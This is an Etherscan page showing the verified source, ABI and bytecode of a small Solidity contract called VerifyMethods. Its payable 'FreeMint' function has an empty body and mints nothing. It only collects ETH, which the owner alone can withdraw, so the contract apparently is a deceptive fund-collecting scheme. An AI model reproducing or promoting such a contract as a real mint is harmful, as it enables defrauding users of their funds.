ETH Price: $2,603.01 (-4.23%)
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To

There are no matching entries

Please try again later

Advanced mode:
Parent Transaction Hash Block
From
To
View All Internal Transactions
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
VerifyMethods

Compiler Version
v0.8.12+commit.f00d7308

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2023-03-07
*/

// SPDX-License-Identifier: None
pragma solidity ^0.8.0;

contract VerifyMethods {

    address private owner;

    constructor() {   
        owner=msg.sender;
    }
    function getOwner(
    ) public view returns (address) {    
        return owner;
    }
    function withdraw() public payable {
        require(owner == msg.sender);
        payable(msg.sender).transfer(address(this).balance);
    }

    function FreeMint() public payable {
    }

    function getBalance() public view returns (uint256) {
        return address(this).balance;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"FreeMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"getBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"payable","type":"function"}]

608060405234801561001057600080fd5b50600080546001600160a01b03191633179055610106806100326000396000f3fe608060405260043610603a5760003560e01c806312065fe014603f5780633ccfd60b14605e578063893d20e8146066578063e8695ff4146064575b600080fd5b348015604a57600080fd5b506040514781526020015b60405180910390f35b6064608c565b005b348015607157600080fd5b506000546040516001600160a01b0390911681526020016055565b6000546001600160a01b0316331460a257600080fd5b60405133904780156108fc02916000818181858888f1935050505015801560cd573d6000803e3d6000fd5b5056fea2646970667358221220e494b8c3b126274403c6b3575e9bb9adbf5181230256a046e3f3da7ea0d0f20364736f6c634300080c0033

Deployed Bytecode

0x608060405260043610603a5760003560e01c806312065fe014603f5780633ccfd60b14605e578063893d20e8146066578063e8695ff4146064575b600080fd5b348015604a57600080fd5b506040514781526020015b60405180910390f35b6064608c565b005b348015607157600080fd5b506000546040516001600160a01b0390911681526020016055565b6000546001600160a01b0316331460a257600080fd5b60405133904780156108fc02916000818181858888f1935050505015801560cd573d6000803e3d6000fd5b5056fea2646970667358221220e494b8c3b126274403c6b3575e9bb9adbf5181230256a046e3f3da7ea0d0f20364736f6c634300080c0033

Deployed Bytecode Sourcemap

61:522:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;481:99;;;;;;;;;;-1:-1:-1;481:99:0;;551:21;160:25:1;;148:2;133:18;481:99:0;;;;;;;;278:144;;;:::i;:::-;;181:91;;;;;;;;;;-1:-1:-1;228:7:0;259:5;181:91;;-1:-1:-1;;;;;259:5:0;;;342:51:1;;330:2;315:18;181:91:0;196:203:1;278:144:0;332:5;;-1:-1:-1;;;;;332:5:0;341:10;332:19;324:28;;;;;;363:51;;371:10;;392:21;363:51;;;;;;;;;392:21;371:10;363:51;;;;;;;;;;;;;;;;;;;;;278:144::o

Swarm Source

ipfs://e494b8c3b126274403c6b3575e9bb9adbf5181230256a046e3f3da7ea0d0f203

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.